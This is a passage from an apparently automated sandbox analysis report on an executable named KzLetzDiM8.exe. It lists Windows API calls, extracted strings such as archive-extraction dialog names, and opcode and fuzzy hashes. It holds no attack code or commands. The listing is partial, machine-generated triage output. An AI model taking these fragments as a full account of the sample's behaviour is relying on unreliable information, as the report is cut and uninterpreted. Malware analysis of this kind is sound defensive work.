                                                            • _free.LIBCMT ref: 0020C84D
                                                            • _free.LIBCMT ref: 0020C85F
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001F1FE5
                                                            • _wcslen.LIBCMT ref: 001F1FF6
                                                            • _wcslen.LIBCMT ref: 001F2006
                                                            • _wcslen.LIBCMT ref: 001F2014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,001EB371,?,?,00000000,?,?,?), ref: 001F202F
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\KzLetzDiM8.exe,00000104), ref: 00207FAE
                                                            • _free.LIBCMT ref: 00208079
                                                            • _free.LIBCMT ref: 00208083
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\KzLetzDiM8.exe
                                                            • API String ID: 2506810119-1489116481
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002031FB
                                                            • _abort.LIBCMT ref: 00203306
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E7406
                                                              • Part of subcall function 001E3BBA: __EH_prolog.LIBCMT ref: 001E3BBF
                                                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001E74CD
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                            Similarity
                                                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                            • API String ID: 3813983858-639343689
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FAD98
                                                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001FADAD
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 001FADC2
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: ASKNEXTVOL
                                                            • API String ID: 445417207-3402441367
                                                            APIs
                                                            • __fprintf_l.LIBCMT ref: 001ED954
                                                            • _strncpy.LIBCMT ref: 001ED99A
                                                              • Part of subcall function 001F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00221030,?,001ED928,00000000,?,00000050,00221030), ref: 001F1DC4
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                            • String ID: $%s$@%s
                                                            • API String ID: 562999700-834177443
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E85
                                                            • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E8F
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001EAC5A,00000008,?,00000000,?,001ED22D,?,00000000), ref: 001F0E9F
                                                            Strings
                                                            • Thread pool initialization failed., xrefs: 001F0EB7
                                                            Similarity
                                                            • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                            • String ID: Thread pool initialization failed.
                                                            • API String ID: 3340455307-2182114853
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RENAMEDLG$REPLACEFILEDLG
                                                            • API String ID: 0-56093855
                                                            • Opcode ID: 61587e878d1f69cdd2b98ce45109fa1a7090c9ecab9590c8725f3b99eea57e26
                                                            • Instruction ID: ae24c7914f6ee450c5f6d00167ff5fa14e59c9def28b700539bc09c46b7ff792
                                                            • Opcode Fuzzy Hash: 61587e878d1f69cdd2b98ce45109fa1a7090c9ecab9590c8725f3b99eea57e26
                                                            • Instruction Fuzzy Hash: 64019276504249BFDB20AFD4FC4CABA3BA6F759354B001425FA05822B0C730D851DBA0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                            • Instruction ID: b05d990baa0425b8b299f51e6788e0df0f347ef80111ba52955b88f68507dccb
                                                            • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                            • Instruction Fuzzy Hash: 78A11772E243869FE711CF18C8917AEBBE5EF55310F18416EE5869B2C3C2798DA1CB50
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,001E7F69,?,?,?), ref: 001EA3FA
                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,001E7F69,?), ref: 001EA43E
                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,001E7F69,?,?,?,?,?,?,?), ref: 001EA4BF
                                                            • CloseHandle.KERNEL32(?,?,?,00000800,?,001E7F69,?,?,?,?,?,?,?,?,?,?), ref: 001EA4C6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 53ca5029a110f39081d74821dc0b7fde0a1d5aaeacdf7092428fb5276dd0569b
                                                            • Instruction ID: cc338c3595f62193d1c4d005e59d2bb736c443b1e9f2c05d518aab1ea795ed23
                                                            • Opcode Fuzzy Hash: 53ca5029a110f39081d74821dc0b7fde0a1d5aaeacdf7092428fb5276dd0569b
                                                            • Instruction Fuzzy Hash: E841CC312487C1AAE721DF25DC49BAEBBE8AF94300F484919B6D1971C0D7A4AA48DB53
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: a1f51be0264617c585b181b341136f66a0c593dffa577e423d0beb7d04c67bd3
                                                            • Instruction ID: 9d23e64b8c8cdd4a3231116854aace08664e7869ee10bb69d47f4792ca11354c
                                                            • Opcode Fuzzy Hash: a1f51be0264617c585b181b341136f66a0c593dffa577e423d0beb7d04c67bd3
                                                            • Instruction Fuzzy Hash: 1541B47590066AABCB25DF68CC099EE7BBCEF15310F100129FE45F7242DB30AE558AA4
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,002047C6,00000000,00000000,002057FB,?,002057FB,?,00000001,002047C6,2DE85006,00000001,002057FB,002057FB), ref: 0020C9D5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0020CA5E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0020CA70
                                                            • __freea.LIBCMT ref: 0020CA79
                                                              • Part of subcall function 00208E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00204286,?,0000015D,?,?,?,?,00205762,000000FF,00000000,?,?), ref: 00208E38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: ad638d222da82451025c6c88fa0558dc1303ada47613334e408933962ca5060d
                                                            • Instruction ID: 7a16e5319e6cc516bd9f6b2be9f7abf94b0a01e6706324816428ba83c9a5bb3b
                                                            • Opcode Fuzzy Hash: ad638d222da82451025c6c88fa0558dc1303ada47613334e408933962ca5060d
                                                            • Instruction Fuzzy Hash: 9F31A0B2A2031AABDF24DF64DC55DEE7BA5EB51310B144228FC04D6291EB35CD61CB90
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 001FA666
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 001FA675
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001FA683
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 001FA691
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 01ac2bb45dcf8c3c7b2710192859f9b241e77deaaefe77e82fd92257908a31b4
                                                            • Instruction ID: 8cd43200c1b70ec1101e8e09938281a72f7ac4d4fae1db64c82bde7efa6be94b
                                                            • Opcode Fuzzy Hash: 01ac2bb45dcf8c3c7b2710192859f9b241e77deaaefe77e82fd92257908a31b4
                                                            • Instruction Fuzzy Hash: A3E0EC35942721B7D361ABA0BC0DB8A3E64AB16B62F416301FA06DA190DBA486018BA1
                                                            APIs
                                                              • Part of subcall function 001FA699: GetDC.USER32(00000000), ref: 001FA69D
                                                              • Part of subcall function 001FA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001FA6A8
                                                              • Part of subcall function 001FA699: ReleaseDC.USER32(00000000,00000000), ref: 001FA6B3
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 001FA83C
                                                              • Part of subcall function 001FAAC9: GetDC.USER32(00000000), ref: 001FAAD2
                                                              • Part of subcall function 001FAAC9: GetObjectW.GDI32(?,00000018,?), ref: 001FAB01
                                                              • Part of subcall function 001FAAC9: ReleaseDC.USER32(00000000,?), ref: 001FAB99
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 00025e5af05a5999b938575805226cffde8a4d482fae98e1e8bb4f168be147d1
                                                            • Instruction ID: 80e929ae655badc77df7e84c0c3fb7f22bb64e7d2392aa2aec63a1918659f487
                                                            • Opcode Fuzzy Hash: 00025e5af05a5999b938575805226cffde8a4d482fae98e1e8bb4f168be147d1
                                                            • Instruction Fuzzy Hash: 5B9100B5208354AFD710DF25D848A6BBBE9FFD9700F00491EF99AD3220CB74A945CB62
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E75E3
                                                              • Part of subcall function 001F05DA: _wcslen.LIBCMT ref: 001F05E0
                                                              • Part of subcall function 001EA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001EA598
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001E777F
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA501
                                                              • Part of subcall function 001EA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001EA325,?,?,?,001EA175,?,00000001,00000000,?,?), ref: 001EA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: e63a041b3aafb7c1d00190ee57053c87cb366406b6c9908b4dd0a0c5583dafab
                                                            • Instruction ID: febaf15acabba0229fb16f25c26917052f1f4e5bc66d2c3dc1fb885079ab0cb5
                                                            • Opcode Fuzzy Hash: e63a041b3aafb7c1d00190ee57053c87cb366406b6c9908b4dd0a0c5583dafab
                                                            • Instruction Fuzzy Hash: 42419271800998AAFB35EB66CC59EEEB37CAF65300F4040D6B609A3092DB745F85CF60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: *
                                                            • API String ID: 2691759472-163128923
                                                            • Opcode ID: 0b665a866df440f4c6938d0392c1510e8a72850b3495389b172e62d070f04d87
                                                            • Instruction ID: 9e8c25e9194b4a4118ecb06eef57fa681c6b4426704ae59473c24c8909acc46b
                                                            • Opcode Fuzzy Hash: 0b665a866df440f4c6938d0392c1510e8a72850b3495389b172e62d070f04d87
                                                            • Instruction Fuzzy Hash: B7316B3210CB819ADB34AE5789C2A7F73E8EFA0B10F15801EF987571C3E7258C819361
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 7b65c4b320de3fb34efd25331e49ee8daf8356085a2f11bbfadb68e2fffc0a4f
                                                            • Instruction ID: c6c66ef5f78a83d5b405a3dbccafe22f2a016f3bd1b977eff32bd32841ec3f45
                                                            • Opcode Fuzzy Hash: 7b65c4b320de3fb34efd25331e49ee8daf8356085a2f11bbfadb68e2fffc0a4f
                                                            • Instruction Fuzzy Hash: 9121327291830E5AC730EA64D885E7FB3ECDFA0750F04042AF740C3152EB69DE5887A2
                                                            APIs
                                                            • DialogBoxParamW.USER32(GETPASSWORD1,00010412,001FB270,?,?), ref: 001FDE18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                             • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: DialogParam
                                                            • String ID: GETPASSWORD1$xz#
                                                            • API String ID: 665744214-2979902089
                                                            • Opcode ID: d2b69dcee324e162916409ae4a25e7ed08e782065492c6cbf9e4d8be8ec9898a
                                                            • Instruction ID: 69dc494e447c1d42a18620418389fb160aefad20176b653a65196b5d1660542b
                                                            • Opcode Fuzzy Hash: d2b69dcee324e162916409ae4a25e7ed08e782065492c6cbf9e4d8be8ec9898a
                                                            • Instruction Fuzzy Hash: BF113872214258BADB21EA74BC05BFF37D9AB2A310F144034FE45AB081C7B4AC94C360
                                                            APIs
                                                              • Part of subcall function 001EF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001EF2E4
                                                              • Part of subcall function 001EF2C5: GetProcAddress.KERNEL32(002281C8,CryptUnprotectMemory), ref: 001EF2F4
                                                            • GetCurrentProcessId.KERNEL32(?,?,?,001EF33E), ref: 001EF3D2
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 001EF389
                                                            • CryptUnprotectMemory failed, xrefs: 001EF3CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 18da09490c613b1ddccc3b743a045c778f4bdebab350d2a6440bc297dd314ba8
                                                            • Instruction ID: 4e051091d5cb720de9936a7cf10025430d2a372ed488d1cce1230932e80bdf8c
                                                            • Opcode Fuzzy Hash: 18da09490c613b1ddccc3b743a045c778f4bdebab350d2a6440bc297dd314ba8
                                                            • Instruction Fuzzy Hash: FC113632601AA5ABDF25AF22EC05AAE3B55FF20750B10816AFC495B291DB70DE53C680
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcschr
                                                            • String ID: <9!$?*<>|"
                                                            • API String ID: 2691759472-2705750350
                                                            • Opcode ID: 6c7ee57f8fc66164c0856f7b638fa81128153d76ce59baf496c414670af94bcb
                                                            • Instruction ID: 61680706d80329aabc39dd1e2acde69669c9f9c4c4a9d1606ad1fe15974ba7ef
                                                            • Opcode Fuzzy Hash: 6c7ee57f8fc66164c0856f7b638fa81128153d76ce59baf496c414670af94bcb
                                                            • Instruction Fuzzy Hash: 57F0D63B554B81C5C7345E2A9C017BAB3E5EFA1320F38041EF4C5872C2E7A188C286D5
                                                            APIs
                                                              • Part of subcall function 002097E5: GetLastError.KERNEL32(?,00221098,00204674,00221098,?,?,002040EF,?,?,00221098), ref: 002097E9
                                                              • Part of subcall function 002097E5: _free.LIBCMT ref: 0020981C
                                                              • Part of subcall function 002097E5: SetLastError.KERNEL32(00000000,?,00221098), ref: 0020985D
                                                              • Part of subcall function 002097E5: _abort.LIBCMT ref: 00209863
                                                            • _abort.LIBCMT ref: 0020BB80
                                                            • _free.LIBCMT ref: 0020BBB4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast_abort_free
                                                            • String ID: p!
                                                            • API String ID: 289325740-1659649850
                                                            • Opcode ID: 94963126a00c2a8279809b26fe546ca507b88bc805c0857f731246b276143feb
                                                            • Instruction ID: c84a6d322bd9b86fcdf1e807934084e32aec2fcbb0a214e6137480c69f1a431a
                                                            • Opcode Fuzzy Hash: 94963126a00c2a8279809b26fe546ca507b88bc805c0857f731246b276143feb
                                                            • Instruction Fuzzy Hash: 8001C435D207269BCB32AF68980156DB7B1BF24724B15020AED24672D7CF706D61CFC1
                                                            APIs
                                                              • Part of subcall function 001EE2E8: _swprintf.LIBCMT ref: 001EE30E
                                                              • Part of subcall function 001EE2E8: _strlen.LIBCMT ref: 001EE32F
                                                              • Part of subcall function 001EE2E8: SetDlgItemTextW.USER32(?,0021E274,?), ref: 001EE38F
                                                              • Part of subcall function 001EE2E8: GetWindowRect.USER32(?,?), ref: 001EE3C9
                                                              • Part of subcall function 001EE2E8: GetClientRect.USER32(?,?), ref: 001EE3D5
